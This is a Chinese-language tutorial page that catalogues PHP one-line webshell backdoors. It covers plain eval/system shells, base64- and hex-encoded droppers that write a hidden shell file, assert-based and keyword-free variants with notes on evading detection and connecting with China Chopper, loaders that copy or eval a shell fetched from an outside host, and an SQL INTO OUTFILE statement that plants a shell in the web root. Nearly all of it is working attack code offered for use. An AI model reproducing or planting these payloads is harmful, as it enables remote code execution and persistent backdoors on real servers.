一、基礎類的一句話--功能僅限于驗證漏洞了,實際中非常容易被查出出來:
1
2
3
|
<?php @ eval ( $_GET [ "code" ])?> <?php @system( $_POST [ "cmd" ])?> |
二、編碼的替換的類型:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
<?php @ fputs ( fopen ( base64_decode ( 'bG9zdC5waHA=' ),w), base64_decode ( 'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==' ));?> //會生成<?php @eval($_POST['lostwolf']);?> <script language= "php" >@ fputs ( fopen ( base64_decode ( 'bG9zdC5waHA=' ),w), base64_decode ( 'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==' ));</script> //php在html內部的一種嵌入方式 <?php fputs ( fopen (pack( "H*" , "6c6f7374776f6c662e706870" ), "w" ),pack( "H*" , "3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e" ))?> <?php session_start(); $_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); $_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' );?> |
三、其他類型:
1
2
3
4
5
6
7
8
9
|
<?php $_GET [a]( $_GET [b]);?> //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; <?php assert( $_REQUEST [ "pass" ]);?> //菜刀連接 躲避檢測 密碼pass <?php substr (md5( $_REQUEST [ 'x' ]),28)== 'acd0' && eval ( $_REQUEST [ 'pass' ]);?> //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 腳本類型:php 密碼為 pass |
四、下載類型:
1
2
3
4
5
|
<?php echo copy ( "http://www.r57.me/c99.txt" , "lostwolf.php" ); ?> <? echo file_get_contents ( "..//cfg_database.php" );?> //顯示某文件 <? eval ( file_get_contents ( "遠程shell" )) ?> //運行遠程shell |
五、無關鍵函數類型:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
<?php $_ = "" ; $_ [+ "" ]= '' ; $_ = "$_" . "" ; $_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" ); ?> <?php ${ '_' . $_ }[ '_' ](${ '_' . $_ }[ '__' ]);?> http: //site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass <? $_ = "" ; $_ [+ "" ]= '_' ; $_ = "$_" . "" ; $_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" );?> |
六、補充知識點:
SQL寫一句話(MySQL):
1
2
3
|
select "<?php @system($_POST[" pass "]);?>" into outfile "/home/webaccount/projectname/www/*.php" #前面是一句話內容 后面是絕對路徑www下的PHP文件,同理其他腳本也可以 |
以上就是PHP一句話木馬小結與SQL語句寫一句話木馬的詳細內容,感謝大家的學習和對服務器之家的支持。